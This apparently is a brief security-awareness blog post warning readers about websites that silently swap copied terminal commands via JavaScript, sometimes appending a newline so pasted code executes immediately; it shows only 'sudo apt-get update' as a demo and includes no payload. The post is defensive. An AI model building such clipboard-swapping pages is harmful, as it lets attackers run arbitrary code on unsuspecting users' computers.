Compromised Code on the Web

An old issue is making a comeback. Sound familiar? You’re sitting at your computer, and some glitchy service or software isn’t behaving as you expect. You’ve exhausted your mental toolkit and don’t feel like digging through the documentation - assuming it even exists.

So, you turn to your favorite search engine to describe the suspected error. Often, this works surprisingly well, with a less-than-reputable site popping up claiming to have the solution to your exact problem. All you need to do is type three or four lines into the terminal - or better yet, just copy the code directly to save time.

Here’s where it gets tricky. On some of these sketchy sites, the code you highlight and press CMD/Ctrl + C on may actually be swapped out by a (JavaScript) script in the background. This replacement is almost invisible at first glance, and you wouldn’t notice until it’s too late.

When the seemingly helpful code gets pasted directly into your terminal, it’s often already too late. This tactic is especially effective with long, complex, multi-line code snippets. A sneaky “Enter” or newline appended to the copied code can even trigger its execution in some terminals, without any further confirmation.

This approach allows an attacker to load arbitrary code, executing it with at least the current user’s permissions.

Here’s a harmless example to try:

sudo apt-get update

The script I created simply displays your computer’s ID and outputs an echo message.

Please avoid copying code directly from websites into your terminal, and always review command lines carefully before executing them.